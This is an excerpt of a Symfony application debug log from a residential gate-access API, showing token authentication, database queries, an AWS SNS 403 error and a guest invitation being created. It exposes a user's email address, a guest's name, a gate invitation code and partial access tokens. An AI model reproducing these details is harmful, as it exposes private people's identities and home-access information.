  8753. [2025-12-21 00:29:50] doctrine.DEBUG: "START TRANSACTION" [] []
  8754. [2025-12-21 00:29:50] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"ac37f938310f627b158741a7fa [...]"] []
  8755. [2025-12-21 00:29:50] doctrine.DEBUG: "COMMIT" [] []
  8756. [2025-12-21 00:29:51] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  8757. [2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8758. [2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8759. [2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8760. [2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8761. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8762. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8763. [2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8764. [2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8765. [2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8766. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8767. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8768. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  8769. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  8770. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8771. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  8772. [2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8773. [2025-12-21 00:29:51] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
  8774. [2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8775. [2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8776. [2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8777. [2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8778. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8779. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8780. [2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8781. [2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8782. [2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8783. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8784. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  8785. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8786. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  8787. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
  8788. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  8789. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8790. [2025-12-21 00:29:51] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  8791. [2025-12-21 00:29:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8792. [2025-12-21 00:29:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8793. [2025-12-21 00:29:51] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8794. [2025-12-21 00:29:51] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8795. [2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8796. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8797. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8798. [2025-12-21 00:29:51] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8799. [2025-12-21 00:29:51] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8800. [2025-12-21 00:29:51] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8801. [2025-12-21 00:29:51] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
  8802. [2025-12-21 00:29:51] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>b600a070-65bd-5fc4-9d94-c1b12402b2c1</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>b600a070-65bd-5fc4-9d94-c1b12402b2c1</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  8803. [2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8804. [2025-12-21 00:30:33] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  8805. [2025-12-21 00:30:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8806. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8807. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8808. [2025-12-21 00:30:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8809. [2025-12-21 00:30:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8810. [2025-12-21 00:30:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8811. [2025-12-21 00:30:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8812. [2025-12-21 00:30:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8813. [2025-12-21 00:30:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8814. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8815. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8816. [2025-12-21 00:30:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8817. [2025-12-21 00:30:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8818. [2025-12-21 00:30:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8819. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8820. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  8821. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  8822. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  8823. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  8824. [2025-12-21 00:30:33] doctrine.DEBUG: "START TRANSACTION" [] []
  8825. [2025-12-21 00:30:33] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"c4e0f8a7-1dba-4478-9799-96 [...]","2":1,"3":"2025-12-21 00:30:33","4":"2025-12-21 00:30:33","5":"Mariana","6":"Borges","7":"060401","8":"/invitation/e249d01de70d35 [...]","9":"2","10":"1","11":"2025-12-21 16:00:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  8826. [2025-12-21 00:30:33] doctrine.DEBUG: "COMMIT" [] []
  8827. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8828. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  8829. [2025-12-21 00:30:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  8830. [2025-12-21 00:30:33] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  8831. [2025-12-21 00:30:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  8832. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8833. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8834. [2025-12-21 00:30:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  8835. [2025-12-21 00:30:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  8836. [2025-12-21 00:30:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8837. [2025-12-21 00:30:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8838. [2025-12-21 00:30:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8839. [2025-12-21 00:30:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8840. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  8841. [2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  8842. [2025-12-21 00:30:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8843. [2025-12-21 00:30:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8844. [2025-12-21 00:30:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
